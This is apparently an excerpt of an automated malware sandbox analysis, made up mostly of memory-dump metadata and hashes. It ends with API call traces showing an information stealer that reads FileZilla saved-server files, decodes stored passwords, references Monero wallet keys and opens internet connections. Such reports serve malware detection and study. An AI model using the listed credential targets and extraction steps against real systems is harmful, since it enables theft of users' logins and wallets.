                        • LocalFree.KERNEL32(?), ref: 00E29BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 21b718bb1b0a3e88768a6d24ba1b9a8fb8f2c6186d7b1c7c754be3a8e208df99
                        • Instruction ID: 5f1a616ebe3d2976bbe02b5bdaa4bbb894e090b1991866fdebf1c45fcc809b8e
                        • Opcode Fuzzy Hash: 21b718bb1b0a3e88768a6d24ba1b9a8fb8f2c6186d7b1c7c754be3a8e208df99
                        • Instruction Fuzzy Hash: CD11C9B8A00209EFDB04DF94D989AAE77B5FF88304F1045A8E915A7354D775AE10CFA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: w=~>$Y?
                        • API String ID: 0-4287603579
                        • Opcode ID: c435a45011fe910c3501e901720ef0df3ad52432f44c0804256353cb25b0e9b5
                        • Instruction ID: e3b2eb0322f817da9a188d81393b25d35a2d33bf2305176ec0ed32ec67fc63f1
                        • Opcode Fuzzy Hash: c435a45011fe910c3501e901720ef0df3ad52432f44c0804256353cb25b0e9b5
                        • Instruction Fuzzy Hash: 31B227F3A0C2049FE3046E2DEC8567AB7E9EF94320F1A493DEAC583744EA3559058797
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: WW$e$h4\Y
                        • API String ID: 0-555393476
                        • Opcode ID: d880f014e81fb200375b142b76d014dac3f1b06a985fb9a15f5b59da80c43c53
                        • Instruction ID: b5b0b770d8a103892a95a6850bf0358a08edcae8da4006e9346511e5133e9e5e
                        • Opcode Fuzzy Hash: d880f014e81fb200375b142b76d014dac3f1b06a985fb9a15f5b59da80c43c53
                        • Instruction Fuzzy Hash: FF5229F3A0C6049FE304AE2DEC8573AFBEAEB94720F1A853DE6C4C3744E63558058656
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: cho.
                        • API String ID: 0-1889560526
                        • Opcode ID: 4f12aa712c04c94368c5fdbb5147fb511b0f51662af8d061c9e088ca0fb5f2ba
                        • Instruction ID: cbda1aef00a57c57b5ea3897ccb925623f8816659a78093845f6fa89adfeb578
                        • Opcode Fuzzy Hash: 4f12aa712c04c94368c5fdbb5147fb511b0f51662af8d061c9e088ca0fb5f2ba
                        • Instruction Fuzzy Hash: F8B2D3F3A0C2049FE3046F29EC8567AFBE9EF94720F1A492DEAC587340E67558418797
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: {B_]
                        • API String ID: 0-3332230653
                        • Opcode ID: 36e4755e22a296df083791dad78f12ee7fe11c1b178d54a49b46fe347dc105b7
                        • Instruction ID: dc4959a05129c3607c1aacbfe6431f3b76294523bbeed646a142563b06950ead
                        • Opcode Fuzzy Hash: 36e4755e22a296df083791dad78f12ee7fe11c1b178d54a49b46fe347dc105b7
                        • Instruction Fuzzy Hash: 508118F3A182045BF34C9A2DDC9577ABBC6DB94310F2B863DE686C7784E97958014286
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1e36845f79e87422c68856c610487ca44bec42f5fb05a29e35c6a26de63fc0c5
                        • Instruction ID: 8328776abe26994659539b96a061ebd3856b7801f6fefdfa5bd8a8eecd164641
                        • Opcode Fuzzy Hash: 1e36845f79e87422c68856c610487ca44bec42f5fb05a29e35c6a26de63fc0c5
                        • Instruction Fuzzy Hash: F561D3B260C6049FE708BE28EC8677ABBE5EB58310F16093DE6C5C7340EA7558548B87
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d9da529c7ef4d94f38491ef89c9c6c9162fdcab1959dc46d2af4b162f35f8d71
                        • Instruction ID: 5b82e0a95f212fdb01d0346ba167f111a997f9af8f5651415bb0f144f9a777c7
                        • Opcode Fuzzy Hash: d9da529c7ef4d94f38491ef89c9c6c9162fdcab1959dc46d2af4b162f35f8d71
                        • Instruction Fuzzy Hash: 216106F3A087008FE344AE29DD8537ABBE6EBD4720F16893DD6D587784E93948458783
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 44c8bcc80e45d2e5e13aed41a5a9dea2b6484a6bc0fd35a296700c17960a91a4
                        • Instruction ID: c911837328ce6d537f424831fe610a88c744204ffa72532d8ac4d1499ee4fe64
                        • Opcode Fuzzy Hash: 44c8bcc80e45d2e5e13aed41a5a9dea2b6484a6bc0fd35a296700c17960a91a4
                        • Instruction Fuzzy Hash: 545105B39082209FE3086A2CDD4577AB7D9EF94320F2B863DDAC553784E979180586D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea7bd7d33e2de64b2ccaaf7c97d87273dde434ef42d0d569b7d15fc886c7f761
                        • Instruction ID: 59fe0b24e759450c18b251cebd5343389cfadd357bd17172bb4e116e6cbdcf55
                        • Opcode Fuzzy Hash: ea7bd7d33e2de64b2ccaaf7c97d87273dde434ef42d0d569b7d15fc886c7f761
                        • Instruction Fuzzy Hash: B951D6F3A1C6049FE308AF29DC9667AB7E5EF94720F16493DD6C583380EA356404C69B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1839f55e44d76004a18b146060e7e5f9b28e1afe623f05b19686b602174cf23e
                        • Instruction ID: 244557c03e96d90870a0579681f3b1c1ad42fa1ce7c8511983c46794c9fb14d8
                        • Opcode Fuzzy Hash: 1839f55e44d76004a18b146060e7e5f9b28e1afe623f05b19686b602174cf23e
                        • Instruction Fuzzy Hash: ED5123B3E041241BF708A53DDC987A6B696DBD4320F0B423DDE8CE7B84E87A5D0582C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e5b803e82720317701770a6eb4cbcb5fe0181f4ee8e984f63b2d891bbf562b4e
                        • Instruction ID: 0481b4e86c143f59eb991b948c9853a38e6e1792c5eb47d93befa0d94bfa7f16
                        • Opcode Fuzzy Hash: e5b803e82720317701770a6eb4cbcb5fe0181f4ee8e984f63b2d891bbf562b4e
                        • Instruction Fuzzy Hash: 235155F3A082249BF3086E2DDC4477ABBD6EBD0720F16863DEAC487784E935480587C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3696f0bc3807b547866e197ebcc6050ba79e7f2baf8a13497019d152df0980d7
                        • Instruction ID: 5ec32c402d3c20b4e5ade91ee544f392a81f72fece1f48b75edda40410b5dafa
                        • Opcode Fuzzy Hash: 3696f0bc3807b547866e197ebcc6050ba79e7f2baf8a13497019d152df0980d7
                        • Instruction Fuzzy Hash: 2341E4B3A083089BF3047E2ADC5877AB7D6EB94320F2B453C87D5433C1ED7958018686
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1da17c846027980d523ba8621bb81f5d22122002522e2271a12770cd7e5edac2
                        • Instruction ID: 00f9c16c2db34b8f86902e878a93bd171feb006f9c691bf19e2e76880b9bb482
                        • Opcode Fuzzy Hash: 1da17c846027980d523ba8621bb81f5d22122002522e2271a12770cd7e5edac2
                        • Instruction Fuzzy Hash: 2A31BEB250C6009FD30ABF29D88667EFBF5FF98710F06482DD6C583654E6785484CA97
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e0c18ed5d9dbb27a5cdffae61469fb68f5cd5c6b1812578451c6592a91f8ef1b
                        • Instruction ID: d3b40172a02868e9807c3f0e3b13363fd17e72b8524be7d2f12cf7f7e408fc52
                        • Opcode Fuzzy Hash: e0c18ed5d9dbb27a5cdffae61469fb68f5cd5c6b1812578451c6592a91f8ef1b
                        • Instruction Fuzzy Hash: 003169B280C614EFE315AF19D8816BEFBE4EF88761F06492DEAC493600D3315844CB87
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E38DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E38E0B
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E299EC
                          • Part of subcall function 00E299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E29A11
                          • Part of subcall function 00E299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E29A31
                          • Part of subcall function 00E299C0: ReadFile.KERNEL32(000000FF,?,00000000,00E2148F,00000000), ref: 00E29A5A
                          • Part of subcall function 00E299C0: LocalFree.KERNEL32(00E2148F), ref: 00E29A90
                          • Part of subcall function 00E299C0: CloseHandle.KERNEL32(000000FF), ref: 00E29A9A
                          • Part of subcall function 00E38E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E38E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00E40DBA,00E40DB7,00E40DB6,00E40DB3), ref: 00E30362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E30369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E30385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E30393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E303CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E303DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00E30419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E30427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E30463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E30475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E30502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E3051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E30532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E3054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E30562
                        • lstrcat.KERNEL32(?,profile: null), ref: 00E30571
                        • lstrcat.KERNEL32(?,url: ), ref: 00E30580
                        • lstrcat.KERNEL32(?,00000000), ref: 00E30593
                        • lstrcat.KERNEL32(?,00E41678), ref: 00E305A2
                        • lstrcat.KERNEL32(?,00000000), ref: 00E305B5
                        • lstrcat.KERNEL32(?,00E4167C), ref: 00E305C4
                        • lstrcat.KERNEL32(?,login: ), ref: 00E305D3
                        • lstrcat.KERNEL32(?,00000000), ref: 00E305E6
                        • lstrcat.KERNEL32(?,00E41688), ref: 00E305F5
                        • lstrcat.KERNEL32(?,password: ), ref: 00E30604
                        • lstrcat.KERNEL32(?,00000000), ref: 00E30617
                        • lstrcat.KERNEL32(?,00E41698), ref: 00E30626
                        • lstrcat.KERNEL32(?,00E4169C), ref: 00E30635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E3068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 40bde837dcf66b751ef62f5b2fd40393f959f9a427729a8b18f654e66db19f4f
                        • Instruction ID: 2c2e793772004a30aa9f962568d6bdb29176c2c48678754d52e4e111b41e6c73
                        • Opcode Fuzzy Hash: 40bde837dcf66b751ef62f5b2fd40393f959f9a427729a8b18f654e66db19f4f
                        • Instruction Fuzzy Hash: 0DD13F72900208ABCB14FBE0DD9EEEE7BB8BF54300F545468F142B7095DE39AA45CB61
                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E24839
                          • Part of subcall function 00E247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E24849
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E259F8
                        • StrCmpCA.SHLWAPI(?,0196FA58), ref: 00E25A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E25B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0196FA08,00000000,?,0196ED50,00000000,?,00E41A1C), ref: 00E25E71
                        • lstrlen.KERNEL32(00000000), ref: 00E25E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00E25E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E25E9A
                        • lstrlen.KERNEL32(00000000), ref: 00E25EAF
                        • lstrlen.KERNEL32(00000000), ref: 00E25ED8
